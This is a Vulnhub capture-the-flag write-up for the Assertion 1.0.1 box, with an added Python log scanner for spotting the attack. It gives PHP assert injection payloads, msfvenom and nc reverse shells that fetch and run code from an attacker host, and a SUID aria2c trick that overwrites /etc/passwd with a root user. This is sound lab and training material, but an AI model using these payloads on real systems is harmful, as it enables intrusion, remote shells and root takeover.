Vulnhub: Assertion 1.0.1

H0j3n
Jul 4, 2020

You won't know unless you try it

This box taught me something new, and I want to share it with everyone who reads this :)

Enumeration

Let's run nmap first and see what we get.

22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.29

Port 80 (HTTP)

Port 80

The website has a lot of pages, so we can run Gobuster to check for any interesting files.

Gobuster Results

But we found nothing interesting. So I checked the page source further and found that the link to open any page looks like this. LFI!!!

http://<ip>/index.php?page=gallery

Local File Inclusion (LFI)

In this case, I always use Burpsuite with my own custom wordlist that I created (check the references).

Burpsuite: Intruder

Add the payload marker as in the above diagram and paste the payloads. Start attack!

LFI Payloads

Okay, usually it works, but this time it's totally not working. So I searched for alternatives or another way to do LFI. Using the keywords “assert” and “lfi”, I found an interesting StackOverflow discussion.

StackOverFlow Discussions

It works nicely! Use CyberChef to URL-encode the payload.

' and die(show_source('/etc/passwd')) or '

Burpsuite: Repeater
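
Seen from the defender's side, the requests above stand out in the web server log. The Python scan below is an added example, not part of the original writeup: it URL-decodes the page parameter from Apache access-log lines and flags traversal attempts and the quote-plus-PHP-call shape of the assert payload. The log lines are constructed, and the rule that legitimate page values are plain names such as gallery is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Apache combined format); IPs and times are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [04/Jul/2020:10:00:01 +0000] "GET /index.php?page=gallery HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [04/Jul/2020:10:00:07 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [04/Jul/2020:10:01:12 +0000] "GET /index.php?page=%27%20and%20die(show_source(%27%2Fetc%2Fpasswd%27))%20or%20%27 HTTP/1.1" 200 1803 "-" "Mozilla/5.0"
192.0.2.10 - - [04/Jul/2020:10:02:30 +0000] "GET /index.php?page=%27+and+die%28system%28%22%2Ftmp%2Fshell.elf%22%29%29+or+%27 HTTP/1.1" 200 54 "-" "curl/7.58.0"
192.0.2.44 - - [04/Jul/2020:10:03:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

# Assumption: legitimate values are plain page names such as "gallery".
SAFE_PAGE = re.compile(r"[A-Za-z0-9_-]+")
# PHP functions whose call syntax has no business inside a page name.
PHP_CALL = re.compile(
    r"\b(?:die|system|show_source|exec|passthru|shell_exec|eval|assert)\s*\(", re.I)
TRAVERSAL = re.compile(r"\.\.[/\\]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Classify one decoded parameter value."""
    if SAFE_PAGE.fullmatch(value):
        return "ok"
    # A quote that closes the string plus a PHP call is the assert-injection shape.
    if re.search(r"['\"]", value) and PHP_CALL.search(value):
        return "code-injection"
    if TRAVERSAL.search(value):
        return "path-traversal"
    return "anomalous"


def scan(log_text, param="page"):
    """Return (line number, client, verdict, decoded value) for suspicious requests."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs undoes both %XX and '+' encoding before the rules run.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            verdict = classify(value)
            if verdict != "ok":
                findings.append((lineno, line.split()[0], verdict, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

Decoding before matching is what catches both the %20 and the + encodings of the same payload.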

First User (www-data)

I will show you 2 ways to get a reverse shell:

First (Msfvenom Payload)

#Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf
#Wget into /tmp (Url Encoded)
' and die(system("wget 'http://<ip>/shell.elf' -O /tmp/shell.elf")) or '
#Run while using multi/handler
' and die(system("/tmp/shell.elf")) or '

Second (Curl Php)

#Create a php reverse shell (shell.php)
<?php
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.142 9001 >/tmp/f');
?>
#Curl and listen (Url Encoded)
' and die(system("curl http://<ip>/shell.php|php")) or '

We got our shell!

Reverse Shell

Root

Let's run linpeas and check if there are any interesting files that can be found.

Linpeas Result

We get a yellow color on the aria2c file!! After checking GTFOBins I found something related to SUID, but it seems not to work at all :’)

GTFOBins SUID aria2c

But I can read /etc/shadow as root using this command:

/usr/bin/aria2c -i <any file>

After a lot of searching, I found a way to overwrite a file as root. These are my steps, and I hope everyone learns something new from my writing :) You can view my previous writeup on how to escalate when /etc/passwd is writable.

#Copy /etc/passwd by reading it as root
/usr/bin/aria2c -i /etc/passwd
#Add a user with root rights to the file
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
#Upload it inside /etc (must be in the /etc directory)
/usr/bin/aria2c -o passwd "http://<ip>/newpasswd" --allow-overwrite=true
#Get the shell! (Pass : Password@973)
su Tom

Rooted! The previous box really helped me a lot this time haha. I would like to thank my friend @ch4rm; if it weren't for him I would not have thought this way xD

Root Shell
